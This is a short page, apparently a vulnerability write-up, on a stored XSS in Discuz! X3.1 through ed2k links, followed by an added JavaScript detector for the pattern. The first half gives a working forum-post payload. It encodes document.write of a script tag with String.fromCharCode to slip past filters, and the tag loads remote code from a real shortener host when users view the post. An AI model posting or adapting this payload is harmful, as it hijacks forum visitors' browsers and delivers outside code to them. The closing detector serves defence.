XSS · Discuz! X3.1 stored XSS via ed2k

ed2k://|file|test|'+JavaScript code to execute goes here+'|test/

The word test can be replaced with any other text you like.
For example, a post body:

So cute, what a pity
ed2k://|file|lovely|'+document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,105,115,46,103,100,47,53,65,110,75,76,88,62,60,47,115,99,114,105,112,116,62))+'|test/


Then wait for a user to view the post; when they do, the following code runs automatically:

document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,105,115,46,103,100,47,53,65,110,75,76,88,62,60,47,115,99,114,105,112,116,62));

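The string is first converted to its individual ASCII codes and then turned back into a string with String.fromCharCode, in order to evade some filters.
In effect it is: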

document.write('<script src=http://is.gd/5AnKLX></script>');
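
A moderation-side check for the pattern above, as an added example that is not part of the original page or of Discuz!: it flags ed2k links by the quote and tag characters in their fields rather than by keywords, and decodes String.fromCharCode so the hidden markup is visible to a reviewer. The function names, the RISKY character set and the example.invalid sample post are assumptions made for illustration.

```javascript
// Added example (not from the original page); all names are hypothetical.
// Assumption: legitimate ed2k fields never contain these characters raw,
// since they can end a quoted string or open a tag.
const RISKY = /['"<>\\`]/;

// Replace each String.fromCharCode(n,n,...) call with the text it builds,
// so a keyword filter (or a human) sees what the browser would see.
function decodeFromCharCode(text) {
  return text.replace(/String\.fromCharCode\(([\d\s,]+)\)/g, (_, list) =>
    String.fromCharCode(...(list.match(/\d+/g) || []).map(Number)));
}

// Return one finding per ed2k link that has at least one risky field.
function inspectEd2kLinks(post) {
  const findings = [];
  for (const m of post.matchAll(/ed2k:\/\/\|file\|(\S*)/gi)) {
    const bad = m[1].split('|').filter(f => RISKY.test(f));
    if (bad.length > 0) {
      findings.push({
        link: m[0],
        fields: bad,
        decoded: bad.map(decodeFromCharCode),
      });
    }
  }
  return findings;
}

// Constructed sample post with the same shape as the page's example,
// pointing at a placeholder host instead of a real one.
const hidden = '<script src=//example.invalid/x.js></script>';
const codes = Array.from(hidden, c => c.charCodeAt(0)).join(',');
const samplePost = "So cute, what a pity\n" +
  "ed2k://|file|lovely|'+document.write(String.fromCharCode(" +
  codes + "))+'|test/";

console.log(inspectEd2kLinks(samplePost));
```

A keyword filter looking for the literal text `<script` never matches the sample post; the structural check fires on the single quote that closes the surrounding string.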